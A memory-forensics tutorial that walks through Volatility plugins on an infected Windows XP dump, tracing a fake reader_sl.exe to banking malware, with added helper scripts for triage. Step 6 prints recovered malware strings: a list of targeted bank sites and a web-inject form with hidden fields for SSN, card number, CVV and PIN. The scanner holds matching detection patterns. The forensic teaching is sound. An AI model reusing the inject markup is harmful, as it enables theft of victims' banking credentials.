Analysing Volatility Memory Dump [6 Easy Steps]

Hello learners, in the first part of our tutorial we learnt how to obtain a memory dump from a computer, which may be either the victim's computer or the computer used to launch an attack. From the acquired memory dump, an investigator can determine the processes that were running on the computer and so build solid evidence that can be used against the suspects in a lawsuit. In this guide, we will perform a digital forensic analysis on a memory dump using Volatility.

 

Requirements

  • Have the memory dump to perform analysis on (you can get a sample memory dump from the Volatility GitHub repo).
  • Have Kali Linux operating system.
  • Have the Volatility forensic framework installed.
  • Have knowledge of digital forensic analysis.
  • Have Python installed.

With that let’s jump right into our guide.


Installing the Volatility memory forensic tool

Step 1: Download Volatility from the GitHub repo

Installing the Volatility memory forensic tool is as easy as cloning it from the official GitHub repo. The framework is written in Python. You can download it using the command below.

git clone https://github.com/volatilityfoundation/volatility.git

 

Step 2: Running Volatility

After the download is complete, navigate to the volatility folder and run it directly with the command below to see the available options.

python vol.py -h

NOTE:

If you want to install the Volatility memory analysis framework so that you can import it in other projects, you need to run setup.py first, before running Volatility.

When trying to run Volatility for the first time, I ran into errors, as shown in the picture below, which you may also run into. You can check for the solution in this post.

[Image: errors shown when running Volatility for the first time]

Having installed Volatility and fixed any errors, we can now dive into forensic memory analysis with Volatility.

 

Forensic memory analysis using Volatility

Step 1: Getting the memory dump OS profile

The first step of the analysis is identifying the OS profile, because every later plugin needs it to interpret the kernel structures in the dump correctly. We use -f to specify the file (in our case the memdump), followed by the plugin we want to run, here imageinfo. We cannot start the investigation without knowing the OS profile.

python2 vol.py -f /your-memdump-location imageinfo

As shown in the image below, we are able to determine the operating system of the memdump under investigation: the PC was running Windows XP SP2, 32-bit (profile WinXPSP2x86), which we pass to every later command as --profile=WinXPSP2x86.

[Image: imageinfo output showing the suggested profile WinXPSP2x86]

 

Step 2: Checking the running processes

The pstree plugin in Volatility lists the processes that were running and shows them as a tree under their parent processes.

[Image: pstree output]

As shown in the image, there is a suspicious-looking process, reader_sl.exe, running under the explorer.exe process. After noting this, we check whether any processes are hidden using the psxview plugin. This plugin is useful because it lists every process found by several different enumeration methods, hidden or not, so a process that one method misses stands out. As shown in the image below, we can see that there is a hidden process running.

[Image: psxview output]
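To make the psxview check repeatable rather than read by eye, here is an added example (not code from the original post or from the Volatility project) that parses a psxview listing, as produced by `python2 vol.py -f cridex.vmem --profile=WinXPSP2x86 psxview` (the same invocation pattern as the cmdline command shown later), and reports processes that psscan finds but pslist does not. The listing embedded in the script is constructed: the offsets, hidden_sample.exe, exited_sample.exe and the exit time are made up so that both the hidden case and the legitimately exited case are exercised. A real run would be fed the plugin's saved output instead.

```python
"""Flag hidden processes in a Volatility 2 psxview listing.

Added example: not code from the original post or from the Volatility
project. The listing below is CONSTRUCTED to resemble psxview output;
hidden_sample.exe, exited_sample.exe, the offsets and the exit time are
made up, and nothing here comes from the cridex.vmem image.
"""

# The seven process-enumeration sources psxview cross-references, in the
# column order the plugin prints them.
SOURCES = ["pslist", "psscan", "thrdproc", "pspcid", "csrss", "session", "deskthrd"]

PSXVIEW_SAMPLE = """\
Volatility Foundation Volatility Framework 2.6.1
Offset(P)  Name                    PID pslist psscan thrdproc pspcid csrss session deskthrd ExitTime
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- --------
0x02498700 winlogon.exe            608 True   True   True     True   True  True    True
0x02511360 svchost.exe            1004 True   True   True     True   True  True    True
0x0225ac20 reader_sl.exe          1640 True   True   True     True   True  True    True
0x02029ab8 hidden_sample.exe      1337 False  True   True     True   True  True    True
0x01e4bd50 exited_sample.exe      2240 False  True   False    False  False False   False    2012-07-22 02:45:01 UTC+0000
"""


def parse_psxview(text):
    """Return one dict per process row: offset, name, pid, flags, exit_time."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with a hex offset and carry at least offset, name,
        # PID and the seven True/False columns; banners and headers do not.
        if len(parts) < 3 + len(SOURCES) or not parts[0].lower().startswith("0x"):
            continue
        flags = {src: parts[3 + i] == "True" for i, src in enumerate(SOURCES)}
        exit_time = " ".join(parts[3 + len(SOURCES):]) or None
        rows.append({"offset": parts[0], "name": parts[1], "pid": int(parts[2]),
                     "flags": flags, "exit_time": exit_time})
    return rows


def find_hidden(rows):
    """Processes missing from pslist (the linked EPROCESS list that Task
    Manager and tasklist walk) but found by psscan (pool-tag scanning of
    physical memory) while still running: the signature of a process that
    was unlinked from the list to hide it."""
    return [r for r in rows
            if r["exit_time"] is None
            and not r["flags"]["pslist"] and r["flags"]["psscan"]]


def disagreements(rows):
    """Map PID -> sources that missed a still-running process. Any
    disagreement deserves a look; exited processes legitimately drop out of
    most sources and are skipped."""
    out = {}
    for r in rows:
        if r["exit_time"] is not None:
            continue
        missing = [src for src in SOURCES if not r["flags"][src]]
        if missing:
            out[r["pid"]] = missing
    return out


if __name__ == "__main__":
    procs = parse_psxview(PSXVIEW_SAMPLE)
    for r in find_hidden(procs):
        print("HIDDEN  pid=%-6d %s" % (r["pid"], r["name"]))
    for pid, missing in disagreements(procs).items():
        print("CHECK   pid=%-6d missing from: %s" % (pid, ", ".join(missing)))
```

The exit-time check matters: a process that has terminated is expected to vanish from pslist while its EPROCESS block lingers in memory for psscan to find, so without that check every recently exited process would be reported as hidden.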

 

Step 3: Checking for open connections and the running sockets in the memory dump

After checking the running processes, we can check the open sockets and connections on the computer. For this we use two plugins: connscan and sockets. The sockets plugin lists the open sockets, while the connscan plugin scans memory for TCP connection objects, which can include connections that had already been closed.

[Image: connscan and sockets output]

From the TCP connections, we note that the process with PID 1484 is connected to the remote addresses 41.168.5.140 and 125.19.103.198 on port 8080. When we list open sockets with the sockets plugin, we see that process 1484 has an open TCP socket on port 1038.

 

Step 4: Checking the last commands that were run

We can now check the command lines of the processes that were running on the PC under investigation, using the cmdline plugin. Checking command lines helps an investigator tie a PID to the executable path it was started from while gathering evidence from the memory dump. We will be looking for process 1484.

└─$ python2 vol.py -f /home/toxic/Desktop/cridex.vmem --profile=WinXPSP2x86 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid:      4
************************************************************************
smss.exe pid:    368
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid:    584
Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid:    608
Command line : winlogon.exe
************************************************************************
services.exe pid:    652
Command line : C:\WINDOWS\system32\services.exe
************************************************************************
lsass.exe pid:    664
Command line : C:\WINDOWS\system32\lsass.exe
************************************************************************
svchost.exe pid:    824
Command line : C:\WINDOWS\system32\svchost -k DcomLaunch
************************************************************************
svchost.exe pid:    908
Command line : C:\WINDOWS\system32\svchost -k rpcss
************************************************************************
svchost.exe pid:   1004
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid:   1056
Command line : C:\WINDOWS\system32\svchost.exe -k NetworkService
************************************************************************
svchost.exe pid:   1220
Command line : C:\WINDOWS\system32\svchost.exe -k LocalService
************************************************************************
explorer.exe pid:   1484
Command line : C:\WINDOWS\Explorer.EXE
************************************************************************
spoolsv.exe pid:   1512
Command line : C:\WINDOWS\system32\spoolsv.exe
************************************************************************
reader_sl.exe pid:   1640
Command line : "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
************************************************************************
alg.exe pid:    788
Command line : C:\WINDOWS\System32\alg.exe
************************************************************************
wuauclt.exe pid:   1136
Command line : "C:\WINDOWS\system32\wuauclt.exe" /RunStoreAsComServer Local\[3ec]SUSDSb81eb56fa3105543beb3109274ef8ec1
************************************************************************
wuauclt.exe pid:   1588
Command line : "C:\WINDOWS\system32\wuauclt.exe"

After running the command, we see that process 1484 (explorer.exe) was among the processes running on the PC. Under the explorer.exe process there is reader_sl.exe (PID 1640). Its name is that of a legitimate Adobe Reader component, but it is connecting to an external IP address that looks suspicious. We can export reader_sl.exe from the memory dump for further analysis.
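Steps 3 and 4 are a manual join: connscan gives remote addresses per PID, sockets gives the local ports, and cmdline gives the executable behind the PID. The following added example (not code from the original post or from the Volatility project) performs that join over the three plugins' text output and raises simple triage flags. The three listings are constructed: PID 1484/explorer.exe, PID 1640/reader_sl.exe and the remote addresses 41.168.5.140 and 125.19.103.198 on port 8080 mirror the post's findings, while the local address 192.0.2.10, local port 1037, the offsets and the timestamps are made up.

```python
"""Correlate Volatility 2 connscan, sockets and cmdline output by PID.

Added example: not code from the original post or from the Volatility
project. The three listings are CONSTRUCTED (see the lead-in for which
values mirror the post and which are made up).
"""
import re

CONNSCAN_SAMPLE = """\
Volatility Foundation Volatility Framework 2.6.1
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x02087620 192.0.2.10:1038           41.168.5.140:8080         1484
0x023a8008 192.0.2.10:1037           125.19.103.198:8080       1484
"""

SOCKETS_SAMPLE = """\
Volatility Foundation Volatility Framework 2.6.1
Offset(V)  PID   Port  Proto Protocol        Address         Create Time
---------- ------ ------ ------ --------------- --------------- -----------
0x81ddb780   1484   1038      6 TCP             0.0.0.0         2012-07-22 02:42:53 UTC+0000
0x82063ac8    664    500     17 UDP             0.0.0.0         2012-07-22 02:42:53 UTC+0000
"""

CMDLINE_SAMPLE = r"""
************************************************************************
System pid:      4
************************************************************************
explorer.exe pid:   1484
Command line : C:\WINDOWS\Explorer.EXE
************************************************************************
reader_sl.exe pid:   1640
Command line : "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
"""

CONN_RE = re.compile(r"^0x[0-9a-f]+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)\s*$", re.I)
SOCK_RE = re.compile(r"^0x[0-9a-f]+\s+(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(\S+)", re.I)
PID_RE = re.compile(r"^(\S+) pid:\s+(\d+)$")
CMD_PREFIX = "Command line : "


def parse_connscan(text):
    """One dict per scanned TCP connection object (live or stale)."""
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            conns.append({"local_ip": m.group(1), "local_port": int(m.group(2)),
                          "remote_ip": m.group(3), "remote_port": int(m.group(4)),
                          "pid": int(m.group(5))})
    return conns


def parse_sockets(text):
    """Map (pid, local port) -> protocol name and bound address."""
    socks = {}
    for line in text.splitlines():
        m = SOCK_RE.match(line.strip())
        if m:
            socks[(int(m.group(1)), int(m.group(2)))] = {"protocol": m.group(4),
                                                         "address": m.group(5)}
    return socks


def parse_cmdline(text):
    """Map pid -> {name, cmdline}; cmdline stays None for System (no image)."""
    procs, current = {}, None
    for line in text.splitlines():
        line = line.rstrip()
        m = PID_RE.match(line)
        if m:
            current = int(m.group(2))
            procs[current] = {"name": m.group(1), "cmdline": None}
        elif line.startswith(CMD_PREFIX) and current is not None:
            procs[current]["cmdline"] = line[len(CMD_PREFIX):]
    return procs


def correlate(conns, socks, procs, expected_ports=(80, 443)):
    """Attach the owning process and the live socket to each connection and
    raise triage flags. The port check is a heuristic: an outbound session
    to anything but the usual web ports deserves a second look."""
    records = []
    for c in conns:
        proc = procs.get(c["pid"], {"name": "<not in cmdline>", "cmdline": None})
        sock = socks.get((c["pid"], c["local_port"]))
        flags = []
        if c["remote_port"] not in expected_ports:
            flags.append("remote port %d is not a standard web port" % c["remote_port"])
        if sock is None:
            flags.append("no live socket on local port %d (stale/closed connection)" % c["local_port"])
        records.append({**c, "name": proc["name"], "cmdline": proc["cmdline"],
                        "socket": sock, "flags": flags})
    return records


def triage():
    return correlate(parse_connscan(CONNSCAN_SAMPLE), parse_sockets(SOCKETS_SAMPLE),
                     parse_cmdline(CMDLINE_SAMPLE))


if __name__ == "__main__":
    for r in triage():
        print("pid=%d %s -> %s:%d  %s" % (r["pid"], r["name"], r["remote_ip"],
                                          r["remote_port"], "; ".join(r["flags"]) or "ok"))
        print("    cmdline:", r["cmdline"])
```

With real data, save each plugin's output to a file and feed the file contents to the three parsers; the join by PID is what lets the investigator say "explorer.exe, started from C:\WINDOWS\Explorer.EXE, held a session to 41.168.5.140:8080" in one sentence of the report.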

 

Step 5: Exporting reader_sl.exe

In this step we extract the reader_sl.exe executable from the memory dump to a folder on our PC. From there, we can perform malware analysis on reader_sl.exe. To export the file we use a different plugin, as shown below.

[Image: dumping the reader_sl.exe executable (PID 1640) to a folder]

NOTE:

When you export reader_sl.exe it will be saved as executable.1640.exe

 

Step 6: Analyzing reader_sl.exe

Having exported the file, we can now analyze it with the available malware analysis tools. How you analyze the file depends on the kind of information you want. Here we use VirusTotal to check whether the executable is malicious. The image below shows the report generated by the VirusTotal check.

[Image: VirusTotal report for the exported executable]

The file is flagged as malicious. Alternatively, we can dump the process memory and read through it to see whether we can find something of interest relating to our investigation. We can export the memory of the reader_sl.exe process using the command shown below.

[Image: dumping the memory of PID 1640]

After extracting the dump file, we can now open it and look for something useful to our investigation using the command below.

strings 1640.dmp | less
*treasurypathways.com*
*CorporateAccounts*
*weblink.websterbank.com*
*secure7.onlineaccess1.com*
*trz.tranzact.org*
*onlineaccess1.com*
*secureport.texascapitalbank.com*
*/Authentication/zbf/k/*
*ebc_ebc1961*
*tdbank.com*
*online.ovcb.com*
*ebanking-services.com*
*schwab.com*
*billmelater.com*
*chase.com*
*bankofamerica.com*
*pnc.com*
*suntrust.com*
*wellsfargo.com*
*ibanking-services.com*
*bankonline.umpquabank.com*
*servlet/teller*
*nsbank.com*
*securentry.calbanktrust.com*
*securentry*
*/Common/SignOn/Start.asp*
*telepc.net*
*enterprise2.openbank.com*
*BusinessAppsHome*
*global1.onlinebank.com*
*webexpress*
*/sbuser/*

In another part of the dump, I found the piece below. We can see that the executable is an information-stealing malware; it specifically targets banking information.

</div>
<iframe name='wj1' src='https://onlinebanking.tdbank.com/images/TDBankLogo.gif' width='0' height='0' border='none' frameborder='0'></iframe>
<form name="injectform" action="" method="post" target="wj1">
<input type="hidden" name="SSN1" id="ssn1" />
<input type="hidden" name="SSN2" id="ssn2" />
<input type="hidden" name="SSN3" id="ssn3" />
<input type="hidden" name="MMN" id="mmn" />
<input type="hidden" name="DL" id="dl" />
<input type="hidden" name="DOBMM" id="dob_mm" />
<input type="hidden" name="DOBDD" id="dob_dd" />
<input type="hidden" name="DOBYY" id="dob_yy" />
<input type="hidden" name="TDCARD" id="cc" />
<input type="hidden" name="expdate_mm" id="expdate_mm" />
<input type="hidden" name="expdate_yy" id="expdate_yy" />
<input type="hidden" name="cvv" id="cvv"/>
<input type="hidden" name="TDPIN" id="pin" />
</form>
*secure.accurint.com/app/bps/mai*
<input*name="PASSWORD_UL">
<input type="hidden" name="PASSWORD_NC" id="pass_nc">
<form*onSubmit="return prepared_pwd
login_script.js"></script>
<script type="text/javascript">
function prepared_pwd2() {
    var df = document.forms[0];
    if (df.PASSWORD.value.length < 1) {
        if (document.LOGIN && df.APPLICATION_TYPE.value != 'irb') {
            build_alert('Enter Password!','Please Enter your Password to Sign On.');
        } else {
            alert('Please Enter your Password to Login.');
            df.PA
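The strings listing above was read by eye. As an added example (not code from the original post or from the Volatility project), the script below automates the same review of a process memory dump such as 1640.dmp (the name Volatility's memdump plugin gives to PID 1640's dump): it extracts printable ASCII and UTF-16LE runs the way strings does, collects hostnames, and flags the web-inject tell-tales visible in the recovered fragment, namely a zero-size iframe, a form posting into it, and hidden inputs asking for SSN, card, PIN and similar data that a bank login never needs. The embedded SAMPLE_DUMP is constructed from a few of the strings the post recovered plus junk bytes; to run it for real, read the dump file as bytes and pass them to scan_dump.

```python
"""Scan a dumped process image for web-inject and bank-targeting artifacts.

Added example: not code from the original post or from the Volatility
project. SAMPLE_DUMP is CONSTRUCTED: a few bank hostnames and form
fragments modelled on the strings the post recovered from 1640.dmp,
padded with junk bytes so the string extraction has something to skip.
"""
import re

SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"*weblink.websterbank.com*\x00*tdbank.com*\x00*chase.com*\x00"
    + b"*bankofamerica.com*\x00*wellsfargo.com*\x00*/Common/SignOn/Start.asp*\x00"
    + b"\x00\xff" * 8
    + b"<iframe name='wj1' src='https://onlinebanking.tdbank.com/images/TDBankLogo.gif' "
    + b"width='0' height='0' border='none' frameborder='0'></iframe>\x00"
    + b'<form name="injectform" action="" method="post" target="wj1">\x00'
    + b'<input type="hidden" name="SSN1" id="ssn1" />\x00'
    + b'<input type="hidden" name="cvv" id="cvv"/>\x00'
    + b'<input type="hidden" name="TDPIN" id="pin" />\x00'
    + b'<input type="hidden" name="expdate_mm" id="expdate_mm" />\x00\x00'
    + "webexpress".encode("utf-16-le")   # a wide string, as Windows often stores them
    + b"\x00" * 8
)

HOSTNAME = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|info|biz|us|co\.uk)\b")
HIDDEN_INPUT = re.compile(r"""<input[^>]*type=["']hidden["'][^>]*name=["']([^"']+)["']""", re.I)
ZERO_IFRAME = re.compile(r"""<iframe[^>]*name=["'](\w+)["'][^>]*width=["']0["'][^>]*height=["']0["']""", re.I)
FORM_TARGET = re.compile(r"""<form[^>]*target=["'](\w+)["']""", re.I)
# Field names a bank login page never needs but a credential-theft form asks for.
SENSITIVE = ("ssn", "cvv", "pin", "mmn", "dob", "card", "pass")


def extract_strings(data, min_len=6):
    """Printable ASCII and UTF-16LE runs of at least min_len characters, in
    file order: roughly `strings -a` combined with `strings -e l`."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append((m.start(), m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append((m.start(), m.group().decode("utf-16-le")))
    return [s for _, s in sorted(found)]


def scan_dump(data):
    """Apply the detection rules to every extracted string and summarise."""
    hostnames, hidden_fields, iframes, form_targets = set(), [], set(), set()
    for s in extract_strings(data):
        hostnames.update(HOSTNAME.findall(s))
        for name in HIDDEN_INPUT.findall(s):
            if any(tag in name.lower() for tag in SENSITIVE):
                hidden_fields.append(name)
        iframes.update(ZERO_IFRAME.findall(s))
        form_targets.update(FORM_TARGET.findall(s))
    return {
        "hostnames": sorted(hostnames),
        "hidden_sensitive_fields": hidden_fields,
        "zero_size_iframe": bool(iframes),
        # A form whose target is an invisible iframe posts the victim's input
        # without navigating away: the classic web-inject exfiltration shape.
        "form_targets_hidden_iframe": bool(form_targets & iframes),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(scan_dump(SAMPLE_DUMP), indent=2))
```

A long list of financial hostnames on its own is only a hint; the combination of that list with a hidden iframe, a form posting into it and hidden inputs named for SSN, card number and PIN is what lets the analyst call the sample a banking information stealer with confidence, which is the conclusion the post reaches by hand.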

 

Conclusion

In the guide above, we performed a Volatility memory analysis to gather information from a victim computer, as our findings show. We discovered malware camouflaged as a process familiar to the user. This is one of the common methods used by attackers when stealing information.

Volatility memory analysis is a powerful skill to add to an investigator's arsenal. The Volatility framework is extensive and helps investigators perform forensic analysis efficiently. The framework is available for the common operating systems.

 
